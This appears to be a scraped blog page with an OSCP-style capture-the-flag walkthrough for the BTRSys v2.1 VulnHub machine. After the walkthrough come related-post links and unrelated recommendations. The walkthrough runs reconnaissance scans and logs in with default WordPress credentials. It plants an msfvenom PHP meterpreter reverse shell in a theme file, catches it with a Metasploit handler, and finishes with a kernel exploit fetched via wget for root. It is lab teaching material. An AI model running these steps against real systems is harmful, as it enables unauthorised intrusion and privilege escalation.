BTRSys v2.1 Walkthrough

Preparation:

Download the BTRSys virtual machine from the following website:

https://www.vulnhub.com/entry/btrsys-v21,196/

1. Find the IP address of the BTRSys virtual machine.

netdiscover -r 10.0.0.0/

2. Perform the TCP/UDP scan using Nmap to find the potential vulnerabilities.

nmap -Pn -sS --stats-every 3m --max-retries  --max-scan-delay  --defeat-rst-ratelimit -T4 -p1- -oN /root/Delete/tcp1.txt 10.0.0.29

nmap -nvv -Pn- -sSV -p ,, --version-intensity  -A -oN /root/Delete/tcp2.txt 10.0.0.29

nmap -Pn --top-ports  -sU --stats-every 3m --max-retries  -T3 -oN /root/Delete/udp.txt 10.0.0.29

3. Browse the target website(http://10.0.0.29) through Firefox.

4. Try to scan the file structure of the target server using the tool Nikto.

nikto -h 10.0.0.29

Browse the target website(http://10.0.0.29/robots.txt) through Firefox.

Browse the target website(http://10.0.0.29/robots.txt) through Firefox.

Try to login in the WordPress using default username/password(admin/admin).

Ahaaa! Login in the admin page successfully.

Go to the Edit Themes page.

5. List all the payload in Kali Linux

msfvenom -l payload

Set the payload module and parameters.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.0.0.26 lport= -f raw

Copy, Paste and upload the generated PHP exploit code to the Wordpress website.

6. Start the Metasploit on the Kali Linux and choose the proper module. Then set the payload module and parameters.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 10.0.0.26

Browse the edited page(http://10.0.0.29/wordpress/wp-content/themes/twentyfourteen/404.php) through Firefox.

So the communication between Kali Linux and BTRSys is established.

Execute the command help to find the commands we can grab.

Core Commands

=============

    Command                   Description

    -------                   -----------

    ?                         Help menu

    background                Backgrounds the current session

    bg                        Alias for background

    bgkill                    Kills a background meterpreter script

    bglist                    Lists running background scripts

    bgrun                     Executes a meterpreter script as a background thread

    channel                   Displays information or control active channels

    close                     Closes a channel

    disable_unicode_encoding  Disables encoding of unicode strings

    enable_unicode_encoding   Enables encoding of unicode strings

    exit                      Terminate the meterpreter session

    get_timeouts              Get the current session timeout values

    guid                      Get the session GUID

    help                      Help menu

    info                      Displays information about a Post module

    irb                       Open an interactive Ruby shell on the current session

    load                      Load one or more meterpreter extensions

    machine_id                Get the MSF ID of the machine attached to the session

    migrate                   Migrate the server to another process

    pry                       Open the Pry debugger on the current session

    quit                      Terminate the meterpreter session

    read                      Reads data from a channel

    resource                  Run the commands stored in a file

    run                       Executes a meterpreter script or Post module

    secure                    (Re)Negotiate TLV packet encryption on the session

    sessions                  Quickly switch to another session

    set_timeouts              Set the current session timeout values

    sleep                     Force Meterpreter to go quiet, then re-establish session.

    transport                 Change the current transport mechanism

    use                       Deprecated alias for "load"

    uuid                      Get the UUID for the current session

    write                     Writes data to a channel

Stdapi: File system Commands

============================

    Command       Description

    -------       -----------

    cat           Read the contents of a file to the screen

    cd            Change directory

    checksum      Retrieve the checksum of a file

    chmod         Change the permissions of a file

    cp            Copy source to destination

    dir           List files (alias for ls)

    download      Download a file or directory

    edit          Edit a file

    getlwd        Print local working directory

    getwd         Print working directory

    lcd           Change local working directory

    lls           List local files

    lpwd          Print local working directory

    ls            List files

    mkdir         Make directory

    mv            Move source to destination

    pwd           Print working directory

    rm            Delete the specified file

    rmdir         Remove directory

    search        Search for files

    upload        Upload a file or directory

Stdapi: Networking Commands

===========================

    Command       Description

    -------       -----------

    portfwd       Forward a local port to a remote service

Stdapi: System Commands

=======================

    Command       Description

    -------       -----------

    execute       Execute a command

    getenv        Get one or more environment variable values

    getpid        Get the current process identifier

    getuid        Get the user that the server is running as

    kill          Terminate a process

    localtime     Displays the target system's local date and time

    pgrep         Filter processes by name

    pkill         Terminate processes by name

    ps            List running processes

    shell         Drop into a system command shell

    sysinfo       Gets information about the remote system, such as OS

Stdapi: Audio Output Commands

=============================

    Command       Description

    -------       -----------

    play          play an audio file on target system, nothing written on disk

Find the Kernel version and current username of the BTRSys server.

sysinfo

getuid

7. Try to find the vulnerabilities related to Linux ubuntu 4.4.0-62-generic in the Exploit Database. Then  download and copy the exploit code file to the folder /var/www/html.

https://www.exploit-db.com/exploits/41458

Compile the source code and download the executable file to BTRSys server.

gcc -o exploit .c

wget http://10.0.0.26/exploit

Ahaaa! We get the root privilege by executing the exploit file.

OSCP Learning Notes - Capstone(2)的更多相关文章

  1. OSCP Learning Notes - Capstone(4)

    SickOS 1.2 Walkthrough Preparation: Down load the SickOS virtual machines from the following website ...

  2. OSCP Learning Notes - Capstone(3)

    DroopyCTF Walkthrough Preparation: Download the DroopyCTF virtual machine from the following website ...

  3. OSCP Learning Notes - Capstone(1)

    Kioptrix Level 1.1 Walkthrough Preparation: Download the virtual machine  from the following website ...

  4. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

  5. OSCP Learning Notes - Buffer Overflows(3)

    Finding Bad Characters 1. Find the bad charaters in the following website: https://bulbsecurity.com/ ...

  6. OSCP Learning Notes - Buffer Overflows(2)

    Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...

  7. OSCP Learning Notes - Buffer Overflows(1)

    Introduction to Buffer Overflows Anatomy of Memory Anatomy of the Stack Fuzzing Tools: Vulnserver -  ...

  8. OSCP Learning Notes - Netcat

    Introduction to Netcat Connecting va Listening Bind Shells Attacker connects to victim on listening ...

  9. OSCP Learning Notes - Enumeration(4)

    DNS Enumeration 1. Host Tool host is a simple utility for performing DNS lookups. It is normally use ...

随机推荐

  1. cb07a_c++_迭代器和迭代器的范围

    cb07a_c++_迭代器和迭代器的范围c++primer第4版https://www.cnblogs.com/txwtech/p/12309989.html--每一种容器都有自己的迭代器--所有的迭 ...

  2. #Linux 下 Xampp的安装与Hello World

    一.下载安装 去官网下载 移动下载完毕的xampp-linux-x64-7.4.6-0-installer.run 到/usr/local/jayce-softwares/xampp目录下(jayce ...

  3. java 基础 流程控制

    鄙人不才,基础不好,趁着闲时简单学习一下,仅作学习分享,如有不正确地方还请各位看客不吝指出. Java流程主要可以分为: 顺序(可以按照正常顺序一步步往下运行的) 选择(三元操作符[?:];if el ...

  4. Redis:rdb和aof

    由于redis的数据都直接存储在内存里,在服务器发生宕机时内存的数据会瞬间清空,那么必须要有重启时恢复数据的方法. redis通过持久化机制将数据存储到磁盘中从而在服务器重启时恢复数据,这篇文章主要简 ...

  5. css的四种使用方式

    方式一:内联样式 内联样式,也叫行内样式,指的是直接在style属性中添加CSS 示例: <DIV style="display: none;background:red"& ...

  6. Spring9——通过用Aware接口使用Spring底层组件、环境切换

    通过用Aware接口使用Spring底层组件 能够供我们使用的组件,都是Aware的子接口. ApplicationContextAware:实现步骤:             (1)实现Applic ...

  7. MongoDB快速入门教程 (2)

    2.MongoDB的基本的CRUD操作 2.1.创建文档 在具体操作之前,想要知道有多少数据库,可以执行下面命令 show dbs 在mongodb中,数据库中包含的叫做集合(表),集合中存储的内容叫 ...

  8. mfc 中unicode 字符和字符串的使用

    在MFC或SDK程序中,不需要进行任何关于unicode的设置,记住下面两个宏,保你程序一路畅通: 用TCHAR/TCHAR*代替char/char* 及wchar/wchar*用TEXT(" ...

  9. 【总结】Github通过Git Bash上传文件到仓库

    1-ML新文件夹连接仓库gir clone(最好用SSH不需要输入账户密码  SSH需要设置秘钥) 2-ML中设立空文件夹与项目同名(要新建  打开隐藏文件选项  文件夹内不许有文件会报错) 3-在项 ...

  10. AJAX 调用WebService 、WebApi 增删改查(笔记)

    经过大半天努力,终于完成增删改查了!心情有点小激动!!对于初学者的我来说,一路上都是迷茫,坑!!虽说网上有资料,可动手起来却不易(初学者的我).(苦逼啊!) WebService 页面: /// &l ...